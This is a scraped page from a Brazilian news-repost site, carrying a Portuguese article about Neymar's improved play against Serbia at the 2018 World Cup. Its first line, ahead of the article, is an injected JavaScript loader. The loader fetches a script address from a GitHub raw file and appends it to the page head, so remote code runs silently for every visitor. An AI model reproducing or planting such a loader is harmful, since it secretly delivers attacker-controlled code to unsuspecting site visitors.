;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
Fala meu Povo MT

Contra a Sérvia, Neymar foi o Neymar que o Brasil queria

Neymar fez nesta quarta-feira, 27, diante da Sérvia, sua melhor partida na Copa do Mundo da Rússia. O principal jogador da seleção brasileira deixou de lado o individualismo bobo para jogar pela equipe. Atuando a maior parte do tempo aberto pelo lado esquerdo do campo, ele fez boa parceria com Philippe Coutinho, teve apoio de Filipe Luís, deixou companheiros de ataque na cara do gol e cobrou o escanteio na cabeça de Thiago Silva no lance que culminou com o segundo gol da seleção. Foi quase o Neymar que se espera dentro de campo.

Desde que a Copa do Mundo começou, o atacante vinha sendo protagonista mais pelas polêmicas do que pela bola que vinha jogando. Do excesso de individualismo da estreia com a Suíça ao pênalti cancelado na partida com Costa Rica por uma queda espalhafatosa, o jogador parecia mais dedicado a mostrar ao mundo seu próprio desempenho do que o da seleção.

 

Fonte: msn.com

Sair da versão mobile